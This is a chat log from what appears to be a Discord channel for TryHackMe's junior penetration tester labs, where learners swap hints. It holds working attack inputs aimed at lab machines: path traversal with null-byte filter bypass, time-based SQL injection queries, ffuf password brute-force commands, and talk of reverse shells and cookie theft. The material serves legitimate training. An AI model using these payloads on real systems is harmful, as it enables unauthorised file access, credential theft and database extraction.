#junior-pentester-path

this SSRF example2 is killing me

idek how I got through ssrf? I've never really done it before

ohhhh actually that was a super cool challenge

i see the mechanics of how it works.. but i'm not getting the answer. just a 404

Need some help im on LFI task 8 flag2 i send my curl command and get "this is a admin webpage! Get the flag! but see no flag

i figured it out it. i was 95% there

|| there something else going on. inspect response ||

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

does the command contain any kind of error ?

because whenever i am trying to bruteforce, i get no results

can I DM you about lfi challenge

you can hit me up tomorrow if you have issues still. going to sleep.
my primary caution about LFI is this

1. inspect the response
2. read the errors **very **carefully
3. if you change the request and make progress.. do it again with changes. see what small changes do. ensure you really know whats happening. your assumption on the website is doing may be wrong

I'm stuck on 3rd challenge. figured out few things but not sure about the next steps, will keep at it. Thanks

Gave +1 Rep to @jade lodge

Hey guys, I need help with first challenge of LFI.

did you check hint? that's all that is needed

Going to check it again, must've been tired last night.

i also quit it last night on 2nd challenge, stuck on last question now. I'm halfway there, need to figure out right function .

Finally got the first challenge of LFI

I was changing the request wrong 😅

is anyone up who has done lfi playground rce question?

I did third then second, and now stuck on first 😛

In Lab #2, what is the directory specified in the include function?
I am trying to solve this from past one day...but I didn't get it
Can someone help in this

need help with first challenge

Enter invalid input and look at how the function is being used

@dusky crescent Sir, I did this but not understanding

try with curl

If you look at the first warning it tells you where it's searching for the file you entered in the input form

That I got sir but what is the next

That's the directory

Okay sir, let me check

thanks!

Gave +1 Rep to @lavish rose

Anyone done Metasploit exploitation Task 6, keep getting Segmentation fault (core dumped)
while running the payload

What does.the directory say? Does it match anything you may have done so far? Does changing something in the cookie change the directory? @modest arch

Answer is not matching with my directory

1. /var/www/html/lab2.php 2. /usr/lib/php5.2/lib/php There are 2 path

@tardy grove Thank you sir! I appreciate your help on the SQL Injection 🙂

Gave +1 Rep to @tardy grove

You need to look at the include() function

You are looking in the wrong place

Sir, Where do I have to look

As MonkeyBoi said, in the include() function

It will currently partially match something you have done to the cookie

Sir, How can I change cookie

Wait

Have i said too much too soon ?

Have you got past the guest screen ?

Oh you must have in order to get the error message

It's task 4 question 2 for LFI

Correct sir

I have my wires crossed ?

Sorry sir, I didn't get you

Oh ignore me

Sorry i thought you meant challenge 2 , I should really learn to read

Solette have you done challenge 3?

I'm on it now. Just booting my machine to have another crack while the kids run circles around me screaming

Have you managed ?

I'm still working on it

I finished the first and second ones

I completed few minutes ago, try with curl. it'll be easier

Thank you all, I got answer

Anyone done the metasploit room yet?

damn thing is driving me insane, the msfvenom machine keeps throwing up segmentation fault

It's killing me

key to this challenge is to take a look at the error in response and fine tune your payload accordingly

I assume this is the error inside the 'include'. I'm not sure I can say too much here. I have reduced it down to ||.php|| but can't get rid of that, and not sure if that's on the right track or not

you are almost there, ||just take a look at how you can get rid of that in lfi#2||

That's encouraging. And you are right, curl is easier

Ugh this is frustrating

@lavish rose mind if I DM you rather than ask here? I just want to make sure I did something right

yeah sure, np

This isnt the flag they are looking for. I found it as well, if you read included documentation you'll find the proper flag 🙂

Anyone able to give me a nudge in the SQLI room? I'm stuck on task 8

I am stuck at challenge3 lfi room... Any nudges?

@lavish rose may I dm u for the chall?

I just need a little hint for the chall...I have completed the room except for this one chall

And now it just seems impossible to do🥲

sure, np

Nailed it.. I had my walking fingers in the wrong order and smashed it out 🙂

post

Same did you finished it?i am stuck on task 8

Yeps... I was pretty dumb to not think it that way... It was given as the first point in that task🤡 nice chall tho 💯

Nice

Can i get a small hint how to get one flag i got last one

same

Use curl with post method

For chall 3

Or burp to intercept and change it to post method

bout that... I tried but it surprisingly didnt work🤔 with burp

How did u made it work with burp?

For me it worked with that. Changed to post, and supplied correct file path and boom got the flag

For 2 i change Cookie to admin but nothing happened

Same

Yeaa, try changing it to file u want to access

Hmm can u share ur burp request personally?

I’ve PM’d it 🙂

PM me the burp request also pls, thx!

could I have a hint for the first question of the challenge on https://tryhackme.com/room/fileinc please?

lol burp tricked my with double encoding on the trailing %00 on challenge3... -> %2500...

anyone having problem accessing machine from content discovery room?

i cant access the link from task 2 which is http://{IP}/robots.txt

it's a very good hint bro

Maybe you can try curl {IP}/robots.txt I got the result when I run this command

I didn't get it

Same

Same question or did it work for you?

Worked for me

I know I need to use POST, but the second step says "enter a valid input to see how the web server behaves", but I don't really know what a valid input would be

But i am still stuck on LIF challenge 8 don't know what to do

Same to me, its killing 😉

Was able to find the first flag, the second and third I have no idea

What did you do for 1st?

4th one was easy

For 2nd i changed cookies to Admin but then i don't know what to do next

Change the method to POST. I changed the request to POST /challenge... and removed the ?file... then I added Content-type: application\x-www-form-urlencoded. At the end I added file=../../../../etc/passwd.

This shows me the passwd file. You can change it to flag1 to find the flag

at the end of where?

hmmm

I can't get it to work

In the request captured with Burp

I just get no response if I do that

I have this
||POST /challenges/chall1.php HTTP/1.1
Host: 10.10.234.157
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
file: ../../../../etc/flag1||

did I miss something?

One moment will try it out

Capture Flag1 at /etc/flag1

Can anyone help in this

change the request method, and use path traversal

chall2 : change the cookie with the file you look for and bypass it with the null byte

please help in the Local File Inclusion - LFI #2 try to read /etc/passwd. What is the request look like?

Thank you sir

Gave +1 Rep to @remote estuary

On LIF? Task 8?

chall3 : change the request method to POST method, use the path traversal and with the null byte to bypass the filter

Sir, this is giving error. please tell us about this

Is chall3 a binary?

No the windows privesc task 6

chall3 : ```
POST /challenges/chall3.php HTTP/1.1
Host: 10.10.151.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.151.115/challenges/chall3.php
Cookie: THM=admin
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

file=../../../../../../etc/flag3%00

Sir, I changed but it is not working

please help in the Local File Inclusion - LFI #2 try to read /etc/passwd. What is the request look like?

i am also at chall3

same

Oh, I figured out flag1

What did you changed?

The file path was wrong, I needed another ../

https://tryhackme.com/room/xssgi

need help in task 8

chall2 : change the cookie value with the file you look for with the path traversal and bypass it with the null byte

in burp any text I type overwrites the other text

what is happening

I try to put a space and it just deletes the character

it's like a block cursor instead of just a bar too

Insert key?

Do we need to host a web server for the RCE part in File Inclusion?

The strange thing is that I cannot reproduce it myself 😩

Yeah that was it thanks

Gave +1 Rep to @tender ravine

It didn't work for me either, but with hydra it worked!

To solve this problem I used curl and find the result for flag1 curl -d 'file=../../../../etc/flag1' -L http://{MACHINE IP}/challenges/chall1.php -v. When I try the same with Burp it doesn't work for me anymore, need to figure it out.

thank you for helping

||POST /challenges/chall1.php HTTP/1.1
Host: 10.10.247.195
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.247.195/challenges/chall1.php
Upgrade-Insecure-Requests: 1
Content-type: application/x-www-form-urlencoded

file=../../../../etc/flag1||

yeah I got it now
thanks for the help

Gave +1 Rep to @tender ravine

This should do the trick using Burp

would be nice to explai nthe x part in this solution here again.

try #room-help or #subs-room-help

I need urgent help in sql injection task 8 blind sqli time based

I got the column names but got stuck after that

heuu guys i'm on the last question of Windows PrivEsc got root access and i'm looking for flagUSP where is this damn file X) i checked on admin/documents and Administrator/documents nothing is here

i may lose my mind on skynets lfi lol its taking the file from my http server but not letting me run it to spawn a shell

HeI ask a question with Local File Inclusion - LFI #2 try to read /etc/passwd have tried a bunch of things buts cant get it working.
things like:-

What's in the file? And is it a .php?

its a php rev shell

anyone??

please

/lang.php?file=/etc/passwd or something like that

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

Please help in this

hey, i can read the contents of /etc/passwd, but i am unable to take /etc/flag1

https://tryhackme.com/room/fileinc task 8

i have also changed request from GET to POST

i'm on task 7 atm, if I get task 8 sorted ill message you

are you currently working on it?

task 7 yes, just starting it now

okay

You can solve this with skills you learned in Task 8 flag1

Don't think too hard. Where would they store x (where x = what they want)

Okay sir, I try it

Hello, I'm trying to complete the XSS room with the final flag. I've tried to steal staff-session cookie wtih the code and my IP address and port but it's not working. i'm sure iI'm connected o the vpn becuase i can ping the machine/access the website. Abnd I've put the IP given for interface tun0 on my machine If someone can help me it could be nice thk y

||POST /challenges/chall1.php HTTP/1.1
Host: 10.10.247.195
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.247.195/challenges/chall1.php
Upgrade-Insecure-Requests: 1
Content-type: application/x-www-form-urlencoded

file=../../../../etc/flag1||

This should work

Any tips on flag2? I have read the hints here and have been manipulating the parameter but haven't gotten anything useful

they have given a website link use that instead of nc

oh man i am doing so much of mistake from the past 2 days instead of doing change request using BURP i am changing it manually

I also have trouble with flag2

it's not happening

..

Try to manipulate the cookie with null byte.

Try curl -d 'file=../../../../etc/flag1' -L http://{MACHINE IP}/challenges/chall1.php -v it should give you the flag

Been trying this too

Sir, Please tell us more about this

please

I can't say more without giving the answer. Look at what they are asking for. Do you know where that is stored? If yes, use flag1 skills to get it. If not, research

You have to send a request first and intercept the reqeust and change the values to this #junior-pentester-path message

Have you done the first part with u%?

I've reached till column names after that I'm just blank

ah ok, im not that far yet

yeah it took a long time to reach there

i kept the foxy proxy off and kept troubling u, sorry

it was easy though

Nice it's working but when I submit the session cookie after decoding the B64 it's not working

I'm currently stuck on finding the tables

Thanks

Gave +1 Rep to @tender ravine

you have to submit only the RHS of the '='

okay wait
I didn't consider the fact that there might be more than 1 table

RHS ?

has anyone completed Linux and/or Windows PrivEsc?

Did you get the database name as ||SQL______|| ?

I have every task done on win privesc except task5

cool, just starting with Linux. wanted to ask what is the difficulty level as I'm completely new to PrivEsc

yeah and I just got the second table_name

so I think it's gonna be easy now

They give you quite a bit of help on the rooms. Should be fairly ok but the topics can be heavy if you are 100% new to them

Yes i'm completely new so will try to digest as much as I can. will it be okay for you if I DM you if i get stuck along the way?

Sure

Thanks

Gave +1 Rep to @fleet horizon

I'm not even getting a delay now i'm trying to find the table_name, even with ||'%';--|| ||UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sql______' and table_name like '%';--|| Is that what you got?

No

You're schema is wrong

it's actually sqli_<something>

the schema

Yes

Also stuck at challenge 3 (task 8) of the File Inclusion room

ill go back to step 1 then, I was getting delays from ||sql______ ||though, thanks.

What have you tried so far?

did anyone manage to get 3 oscp tickets?

Thanks! Tried php://filter, used the NullByte %00 and tried to encode url's. Directly in the browser and with BurpSuite.

Gave +1 Rep to @drifting drum

Gotta think a bit out of the box on this one. Not everything is filtered. There are some good hints in the channel already due to some other POSTS

think im on the way to the table name now

||analytics_(SOMETHINGHERE)|| right?

no

fml

but the table schema is ||sqli_four ||right?

yes

try other letters for the 1st string

bah just realised the table name that I was finding is already shown in the SQL query box...

try SLEEP(2) for fast results

im on task 5 of File inclusion

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

im stuck on this question.

Nothing I'm inputting is working.

Use and add one by one ../ (hit & trail)

http://10.10.250.7/lab6.php?file=

should I have file= in there?

I'm trying to do this room, and I'm stuck on the last part of task 2, in the mock browser, it says the Server Requesting bar will show the url, but nothing shows there

https://tryhackme.com/room/ssrfqi

It was fun ! thanks thm

yes

yeah lol

making progress now

found the columns in the table now

looks like you are going down the same rabbit hole as me

but keep going

http://10.10.250.7/lab6.php?lang=languages/../../../../../etc/passwd

try to figure out on your own

am I on the right track? I just keep adding ../

you have to print the os-release file and bypass the filter

http://10.10.250.7/lab6.php?lang=languages/../../../../etc/os-release

so like this?

also bypass the filter

so double //?

read carefully the explanation above

ah okay

monster hasnt kicked in yet

lol

Have a look how the error messages change if you set the cookie to something other than Guest or Admin.

does that mean something's broken?

No it means that your syntax is incorrect

Is this not right? ||https://website.thm/item/2?server=https://server.website.thm/flag&id=9&x=||

Got there in the end for the sqli time based injection

that was tough

thanks for the help

I got it. Thanks though

Gave +1 Rep to @wet silo

http://10.10.250.7/lab6.php?lang=languages....//....//....//....//etc/os-release am I on the right track? I still feel like I'm messing something up somewhere here.

anyone know?

LFI task8 chall2 any hint

i changed it from guest to admin using burp but didn't get the path

So should we directly enter path in cookies?

trial and error is the key

oh, got it

still wrong

sent ya a pm

try -sN

there is not an input field in challenge2 of LFI

but how to change guest to something else in web dev. tools

when i click or double click on it, nothing happens

You need to change the cookie in the dev tools and set it to admin

ok

You very clearly didn't pay attention to the modules before this one. It's clearly explained I the one that does over how to use developer tools

Man, I love that you're adding new learning paths! Can't wait to get started on this bad boy after I'm done in Complete Beginner. 😄

haha

can you say me that which module are u talking about

yeah

if you are talking about waling an application, then for your kind information, i have completed that module and that module doesn't show about editing cookies

@drifting drum

pretty sure he meant "task", not "module"

but thats not the issue

i need help in Local File Inclusion - LFI#4 i don't know the request

yes, that's not problem

i was doing that, but he mentioned like, you didn't pay attention

Still can't get task 4 on Authentication Bypass working

I can't figure out what im doing wrong

what's the prblem

I do all it asks, and can't get the creating an account curl request working

check the command again

I do it, but can't find anything from the output it sends

you might be missing something

did u find valid usernames ?

yes

If you use Firefox

1. Open developer tools
2. Go to Storage
3. Go to cookies
4. Change name from Guest to Admin

I got the 3

are u sure that the file just contains, useranmes and nothing else

it contains 4

each line contains 1 username

the 3 ones from the task and admin

yes

Give Lab #1 a try to read /etc/passwd. What would the request URI be? - here is where i am stuck

I can show you the file i have for it in dms

ok

check this #junior-pentester-path message

thanks for teaching something new

Gave +1 Rep to @tender ravine

No problem 😉

but bro, it's showing empty data for the site

No. It dosent show exactly how to edit a cookie, but it shows you how to interact with 3 out of the 7 tabs in dev tools. You should be able to figure out what to do from there

i mean no cookies, but it's showinfg the cookie in network

👍

i have no idea dude wtf is this ? It should be easy it dosen't sound so complicated

I am not getting LIF task 8
Flag 2 and 3

For 2 i know need to change THM to admin
I tried adding path also but not able to read flag

For 3 i only able to read welcome file

@autumn crypt what module/task is that?

https://tryhackme.com/room/fileinc Task 4 Local File Inclusion - LFI -Give Lab #1 a try to read /etc/passwd. What would the request URI be?

You need to capture the request and change it from GET to POST and add file=..// to the request

||You can just edit the page source too.||

i think youre mixing the questions up

youre talking about challenge #1/flag1, not the lab#1 from task4

Ohhh

Oh, sorry you're right

Yes but not able to understand

For task2 do i need to create more cookies? Or need to play with Only THM admin cookie?

i changed the cookie from guest to admin

using burp

nothing happened

also, even after refreshing nothings happening

I guess no need of burp in this task

You only need to use dev tools for LFI2

ok, but in storage

Right

nothing is showing up

After you change it to admin, play around with changing it to different values

Gave +1 Rep to @coarse marsh

!rep @loud spire

uh

thanks @loud spire

Gave +1 Rep to @loud spire

Yes

in storage it's showing NO DATA PRESENT FOR SELECTED HOST

for the file inclusion website

thanks @coarse marsh

Gave +1 Rep to @coarse marsh

Hi all, can anyone give me an direction on room SQL Injection in Task8.

I couldn't figure out this.

make sure you have the cookies section selected

What did you try so far?

it is

and have you refreshed the page?

yes

more than 3 times

the cookie is showing up in the network section but it's not showing in storage section

Am I blind or does the windows PrivEsc room not tell you how to connect to the machine?

https://website.thm/analytics?referrer=referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'sql%';--
This confirms works.

https://website.thm/analytics?referrer=referrer=admin123' UNION SELECT SLEEP(5),2 where table_name like 'user%';--
This gave syntax error. 

Neither of those should work. You can't just copy paste the commands given to you

the first one should work?!

1st worked. Got confirmation DB name is sql

That's not the dB name

And no the first one should not work

"referer=referer=admin123"

That won't work

it is my type here.

typo

oh, wasnt even looking at the first part :(

Like I said, you can't just copy paste the commands

only looked at the part after union select

Yep

the confirmation is that the db name STARTS WITH sql and is NOT JUST sql

thanks @tender ravine \

Gave +1 Rep to @tender ravine

Well it's pretty straight forward, simply use telnet MACHINE_IP PORT ^^?

thanks @shadow echo

Gave +1 Rep to @shadow echo

but i just read something else in the question "What is the name of the running server?"

if nobody already helped you, for sure

i was entering the hostname and was confused why it just didnt work, "name of the server" refers to "what webserver is running"

Okay, ye so I guess you are good now 🙂

Thanks, this put me on the right track. I was continuously focused on the admin user (flag found 😀 )

Gave +1 Rep to @steel nymph

ok so maybe I'm just ultra dumb

sitting here staring at the LFI module lab 1

Wondering why Im just chilling in the www directory and it wont let me out

even abusing the ../../

am I doin somethin incorrect here.

For that you need to modify the request from a GET request to a POST request

you did it again, mixing up lab1 with challenge1 :)

i'm having trouble with challenge1, i've tried modifying the request in burp suite and still not getting the flag to return

Really? I will shut up for a while 😅

||Don't use burp, look at the page source||

man how to bypass /

because in the third one it's filtering out /

ok

welp

thats enough for the day.

makin my head hurt.

If I followed those directions to the T that I did. This should operate how I want it to.

and its not

so.

ii have the cookie for the XSS Task 8 but doesn't work

Coffee break.

okay so its not super clear how to modify the request in the source page

I modified the request just fine through the network manager.

It didn't do as I wanted it to.

Are you talking about LFI Challenge 1?

I did that .

doesnt move.

can i get help

files there.

@steel nymph

im pretty sure youre overthinking it somehow

Im sure chilli

Thats what I get from going from a intermediate thm room

to lab1 in jrpentest

OVER THINKING

but thats why the gods created the miracle elixir called coffee.

Ill just come back to it later.

I might need to restart the machine or something maybe. IDK.

good to know that task 8 needs a cookie, my head has been exploding trying to do it

manual sqli is so terrible

@steel nymph tats what i did.

https://tenor.com/view/jon-stewart-eat-eating-popcorn-watching-gif-5102037

file=

It's not that bad. Just time consuming

ye.

ik.

it's bad when you're balancing school, relationships, prepping for 4 different competitions, and this 😂

lol.

Loool

@steel nymph now you understand my head is exploiding

sqli will be the end of me

when something should work.

I should be working rn, but here i am on discord

tzu just use a tool.

I guess it would be cheating

@noble rose tbh same 😂

and you could do it manually.

but thats a lot of headache

would it technically be cheating tho

30 mins and i bounce fuck offices

more like using resources

cheating would be look up a walkthrough

all LFI challenge, you can use curl to solve the problem

new content = no writeups/walkthroughs, cant be tempted to take the short path

@cobalt tundra we were talking if using a tool like sqlmap would be cheating instead of doing it manually.

I just want that 3 months subscription

XP

@steel nymph DM me

that's what I did lol, I wasn't able to get the post requests to work in firefox

I wanna figure this out real quick.

-X POST coming in clutch

if he doesnt answer, just dm me @viscid ice

Im gonna go back in there in like 2 hours, i might need help as well

guess i'm not understanding how your supposed to modify your request into a post request for challenge 1, the LFI examples previously are not helping to wrap my head around it

any solve the XSS Task8 challenge? got the staff-session cookie but didn't work

What part are you posting?

well i already tried with burp, it didn't work

After you decode with base64, it should just be the part after =

Can i ask why do we need to change it from GET to POST? What's the reason behind it?

got this ||37491cd210a555e54575511e0fbbd67b||

I see, thanks man

Gave +1 Rep to @steel nymph

yea

that box can fuck itself.

Burp Suite: The Basics machine is not loading in webpage

Has anyone completed the Linux PrivEsc task 5? Just want to check if the CVE i'm looking at is correct as I can't get the exploit to run correctly

anyone done task 7 from Linux PrivEsc? need help. in the follow along nano is used but on the lab machine suid is not set for nano

just try doing a nano escape and see if it does anything?

i've modified the request using the dev tools and tried using the console to change the request as well, i'm not sure why it still gives a response of doing a get request

will give it a try

will look into it as well

Anyone on Linux PrivEsc Task 5, is ||37292.c|| correct?

yes

fml im doing something wrong then

if I run it on the target I get loads of errors

did you compile it?

PM me if you need help

that is the exploit file for that CVE from exploit-db

No I didn't, completely overlooked it, I'll try that now thanks

Gave +1 Rep to @lavish rose

Compiling solved the issue

Thanks

I am on File Inclusion: "In Lab #2, what is the directory specified in the include function?" how do I find this? I tried 10.10.X.X//lab2.php?file=/etc/passwd is that not the correct syntax? It looks like I am getting an error but I'm not sure. Could anyone give me a nudge?

not able to find another binary which can be used. can you give any hint?

bruh, hour 1 of pressing delete and 'abcdefghijklmnop_' OVER AND OVER

I'm gonna go insane from this bro

tried with it already, will keep digging more.

I'm just getting the warning: include(includes//etc/passwd) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab2.php on line 26 is there somewhere else i should be looking?

Hey could I pop a question off someone real quick for the last SQLi challenge

just to verify something

how did you get the cookie ?

tried decoding ?

Thank you, I think i was expecting a different type of directory. Appreciate the help

Gave +1 Rep to @steel nymph

got it. instead of file read was trying other things.

It works...

thanks

Gave +1 Rep to @steel nymph

Investigate better the folders permissions

@steel nymph yeah i used an other way to do it, don't remember if it was SUID or not but it worked

Gave +1 Rep to @short prairie

||think i used suid on base64 and get the flag like that||

Its normal, congrats!

Can i ask for help with a flag on the jr pentester im having trouble with here or is that more #room-help

Alright

I am having a bit of trouble on the directory flag on the walking an application task

i cant figure out where the txt file is

Yea task 3

Im not too sure what they should be looking like

Yup, i got it open

yeah i saw 6. clicking those sends me to some big lengthy code sites

For the last SQLi challenge my payload is ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables where table_schema = 'sqli_four' and table_name like 'analytic___________%';-- - (it wont show all of them but there's a bunch of _'s, I just kept adding them till it stopped sleeping)|| but it won't accept that table name, I've tried appending a-z, 1-0 on the end and it doesn't seem to accept any of those characters... what's up?

yeah, I thought it was ||analytic|| too, it went even further than you have there.

is it more letters after the C? or a bunch of _'s then more letters @robust steeple

I'm not too sure. Sorry, but i keep getting a bit confused reading it more since im not too sure what a directory is

@modest arch I think you need to change it entirely

You have 2 issues.

1. the table name is wrong. Try starting with u.
2. Your refferer is wrong. Refresh the task and look at what the refferer is supposed to be

that's a rabbit hole

no wayyyyyyy I spent so long on it 😂 thanks guys

Np

If you really don't know what a directory is then this is not the pathway for you

Oh its that. I was just a bit confused for a second

Ohh i see now. Thanks for the help lassi

I just had a moment with my brain where i fail to notice the obvious

thanks again

for linux privEsc, task 7, i managed to crack the passwords. but from what i think nano is required with suid bit set to write our own user. am i right? any hints would be good

okay

okay, thanks for the heads up

Gave +1 Rep to @steel nymph

Can someone help me out for windows privesc task 5? I'm not entirely sure what I'm supposed to do here.

Kekw

yeah same

Not the platform for that

On LFI challenge 3, whenever pass a null byte to curl, it says something along the lines that using binary will mess up my output..... I'm starting to go mad

Output it to your terminal anyways

It should work

I'm not entirely sure how. Something about the --output flag, but it requires a filename? And when I did that it looks messed up

It should tell you how

IIRC it's --o -

Omg tell me I missed the space

please can someone help me with 3 flag of LFI

i am unable to bypass /

I'm stuck too, I'll see if I can do it after dinner when the kid is in bed

hello, need help for lfi challenge 2

got challenge 1, 3

i just got it the output is helped

@opal stirrup @lavish rose I owe you both a beer

Yes I just tried it and voila it worked

hi guys i am stuck at the cronjob part at linux privesc can anyone give a hint about it

only challenge 2 is left, I am stuck after cookie value change to admin

it was driving me mad i was having the same issue as you

i overwrote the backup.sh file but cannot get a shell

then about the wildcard i was going to creat --checkpoint=1 files but there was no directory such as admin

LIF task 8 Flag3 what to do need hint
able to read welcome file

You need to keep editing the cookie

How far have you got?

like i know /etc/paswd convert into etcpasswd.php

omg dude yes same here

but this doesnt make any sense cronjob file should already been assigned as exec

The hint is strong in this one.

Some filtering going on, but you need to work out what is causing it

didnt delete it just overwrote it using vim

it's possible to use same payload from this study room?

Tinker with the cookie value and see how it changes the page

u can use curl

I did

It worked. Curl is king

Or queen

got it, thanks

Gave +1 Rep to @opal stirrup

What

I'm stuck on this practical for the repeater room. Task 7 cuz I don't see where the damn validation is happening cuz it's not in the header and I feel so dumb lmao please help ;_;

Good morning, I keep getting an error code on Subdomain Enumeration Task 6. After entering ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}

How're you inputting the value for size

ecountered error report size filter or matcher invalid value

i looked above and the file size i saw the most was 472

from the line without the fs command

@left flicker how does the commandline look like?

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {472}

with my machine ip plugged in

This you want to just enter 472

Take away the curly braces

oooo

^^

thank you!

No prob!

welcome to the club 😄

Is this pentester role temporary?

But if anyone knows what the hell I'm looking for here please let me know cuz I'm legit stuck

nonnumerical

I'm only getting 400 and 404. I'm glad to see I'm not crazy xD lemme try %00 or negative integers

Ty

Hey guys!

I'm at LFI Challenge 2, i changed the cookie value from Guest to Admin, it worked, now what?

I have no clue what to do mext

On it

Thanks bro

Yeahhhh i see now

I think i know what to do

Also thank you for this I figured that was the case but headspace is broken today xD

Gave +1 Rep to @steel nymph

I am stuck on Authentication Bypass task 3. Not seeing any return from the ffuf command. Any suggestions?

Were you able to figure it out?

I get output as like the ::METHOD and functions like that but cannot see the successful username/password combo anywhere

Ok so i know that next the path in the cookie is the way to go am i right?

yes

Good

you ?

Yep

CooL then

In the output I get two : : Wordlist 's and they are correct paths. I copied and pasted command from instructions to attack box

https://imgur.com/a/gCNCRoe

Can i dm you?

valid_usernames.txt is in my current working directory

What is the flag from the SSRF Examples site?

What file am I using in the RFI challenge ?

You need to make your own

Oh

Please help in this

No worries I will keep messing around with it thank you for helping so many of us

Gave +1 Rep to @steel nymph

Please give some hint

Sure sir

Have you got answer

Sir, I didn't get, Please help

no, i'm still stuck on it.

awesome, thanks

Gave +1 Rep to @steel nymph

1 room left and the only thing a get is pentester title and 1 day freeze dammit so unlucky man

will try after dinner and if i still cant get it can I dm you if you dont mind?

@sly fiber Sounds unlucky man!

you mean typed real quick?

Hi Guys, anyone done Task 6 on Linux PrivEsc? ||Am I meant to compile the LD_PRELOAD .so on the attack machine and wget it into the target?||

Try it

oh I see, it was an example only. I misread

Yeah I found I had about 30 to40 seconds and it would drop

I typed real quick too but it still says connection closed by foreign host. Like I am not even able to connect to any of the services on the targeted IP.

No

Sorted now ;), I had misread the section

👍

@hollow river you entering each one individually?

Anyone finish task 5 of windows privesc?

The DLL hijacking one

I don't understand what it wants me to do

yes like, telnet <ip> <port>

dm me man

LFI challenge 2 - any hints? I htink i know what I need to do but not working

https://tenor.com/view/cookie-monster-awkward-im-here-gif-13846384

thats your hint

lol

haha.. good one @modest arch 😄

i've changed the cookie and i'm trying my payload

but....no cigar

On Authentication Bypass, Task 3 Brute force, I entered the string and got an error cause i didnt create a file from the username enumeration. do you need to create valid_usernames.txt with the valid usernames or is there a command to save the pull from the enumeration?

ok, check the error message very carefully and compare to what you have entered in the cookie

Need help in File Inclusion room.

a gentle hint. I am close. I have no idea what is wrong here. or if I am missing anything

I'm stuck on task 8 of SQLi, any hint?

hmm ok

my cookie is wrong then

same as dizzy666

if this is a hint.. damn..

lol

what is that.. 😅😅😂

yes, read carefully, and think about the start of the URL you enter in the parameter field

any hint on SQLI task 8

there are more than 1 tables
that's your hint

can i pm you?

sure

file inclusion challenge 8 last question - any hints?

oh wait

man im dumb

yes the RFI

thx i got it 😄

omg RFI

done, phew

Walking An Application
can't access url https://10-10-187-67.p.thmlabs.com via the hackbox

attackbox I should say

@steel nymph I can't get simplehttpserver to work, how should I serve the file u think?

Gave +1 Rep to @steel nymph

thanks

there is a python3 version of the http.server

aye

its what i used

python3 -m http.server 80

doesnt work for me on the attackbox

create a http server in the directory you have the file in with command

python3 -m http.server 8000

then when you want to retrieve the file you issue a command not on your machine
wget http://<your_ip>:8000/<file>

port 80 is in use no doubt

Most of the time 80 will be in use

lol

Thanks guys :p

🙂

Anyone else have seriously unstable boxes all day?

ive got no clue on this LFI challenge 2

What have you tried?

ive set cookie

ive then tried a payload on end of url ?file=<path>/../../../../etc/flag2%00

What did you set the cookie to?

ive even repeated in BURP

admin

Keep playing with the cookie value

:p

See what happens when you change it

Any pointers on RFI last challenge?

throws errors and thats where i determined path

ive done all others 😄

RFI was easier....

haha

i agree

Not sure if I am completely missing the point. Answered all question except for #3. I've tried to give input on multiple ways but it keeps filtering all my special characters. even numbers. ascii encoded. url encoded different verbs such as post and get but no luck. What am I missing?

I've read it enough lol

Hint says "Not everything is filtered!"

@bold fossil think about httml method and filtering

tried all keys on my keyboard

filters all the special keys and numbers

have you got your file served?

yeah

did you set up what needed to be setup

kk

||consider that you won't get there using the browser||

so you need to ||listen|| to that after you have delivered it

aha, how do I do that spoiler thing?

For #3?

||

either side

that pipe thing

||lll||

voila

@glad drumman ||think about the environment and type of file being hosted||

so I need to ||listen|| through web developer in the browser or nc?

i can only say how I did it, not what you should do

but i used curl

I am, I tried ||both .php and .txt and .text|| but I didn't ||listen||

p

listen to it after uploading the proper file with right extension

feel free to drop me a DM in case i spoil it for others

@bold fossil ill swap ya lol

@steel nymph cgcgcg

Can you help me with the dll hijacking task? I'm confused as to what I'm supposed to do

Whichever you preffer

Im on same task. You need to follow the example, create a dll on your attack box and upload to victim box. The problem is windows defender is ON and the dll in the example gets caught. I guess we need to bypass AV

Now that sounds like a bug

Haha

Yea

I just saw defender is turned on

Gonna try to get it to work anyway

Will confirm if it stops it from working in a minute

probably

It likely is a bug, however, I was still able to complete the task even tough defender is active

#room-bugs

Anyone knows why this request doesn't work ?

